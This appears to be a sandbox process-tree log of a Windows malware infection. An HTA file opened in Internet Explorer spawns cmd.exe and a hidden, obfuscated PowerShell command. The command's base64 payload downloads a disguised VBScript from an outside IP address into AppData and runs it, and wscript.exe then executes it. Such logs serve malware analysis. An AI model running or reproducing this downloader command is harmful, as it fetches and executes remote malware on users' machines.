iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ienetworkupdateshere.hta.html
204
cmd.exe "C:\Windows\system32\cmd.exe" "/c POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'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'+[cHAr]0x22+'))')))"
552
powershell.exe POweRSHEll -EX bYpASs -Nop -w 1 -C DEvIcecRedEntiaLDEPLoYment.ExE ; IEx($(iex('[sysTEM.TExt.EncOdinG]'+[chAR]0x3A+[ChAR]0X3A+'UTF8.getStRiNG([syStEm.ConvErt]'+[chaR]0x3a+[CHaR]58+'fROMbASE64StRing('+[ChaR]34+'JGt1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpiTUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGxRQ1ptekksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmxJLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4QSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUWVBVZnBaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV1ciICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1QSWltd2NwbENNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvMjAvbmV3cGljdHVyZXRvZ2V0dXBkYXRlbmV3dGhpbmdzLnRJRiIsIiRlTlY6QVBQREFUQVxuZXdwaWN0dXJldG9nZXR1cGRhdGVuZXd0aGluZy52QlMiLDAsMCk7c1RBUlQtc2xFRXAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXG5ld3BpY3R1cmV0b2dldHVwZGF0ZW5ld3RoaW5nLnZCUyI='+[cHAr]0x22+'))')))"
2120
csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\yyt_sflz.cmdline"
2860
cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES5CEC.tmp" "c:\Users\test22\AppData\Local\Temp\CSC5C7E.tmp"
1608
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\newpicturetogetupdatenewthing.vBS"
1560